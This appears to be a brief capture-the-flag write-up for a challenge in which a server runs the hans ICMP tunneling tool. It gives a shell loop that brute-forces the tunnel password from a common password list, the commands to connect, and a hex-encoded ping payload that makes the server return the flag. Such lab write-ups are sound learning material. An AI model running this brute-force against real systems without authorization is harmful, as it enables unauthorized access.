-
Realize the server is using
hanssoftware for tunneling over ICMP. One can easily found that by googling "hans icmp". -
How to find a password:
Option 1. Based on hans source code, crack the password. See the last lines of solution.py
Option 2. Brute-force:
for PASSWORD in $(<xato-net-10-million-passwords-100.txt); do echo "### $PASSWORD" ; sudo ../src/bin/hans -p "$PASSWORD" -c "$SERVER_IP" -f -v ; done
- Connect with found password
./hans -p "$PASSWORD" -c "$SERVER_IP" -f -v
- Do the same thing as in PCAP capture (send special pattern)
>>> s='pleasegivemeflag'
>>> print(''.join([hex(ord(c)).replace('0x','') for c in s]))
706c65617365676976656d65666c6167
ping 192.168.18.1 -p 706c65617365676976656d65666c6167
- Observe the flag in an ICMP response payload.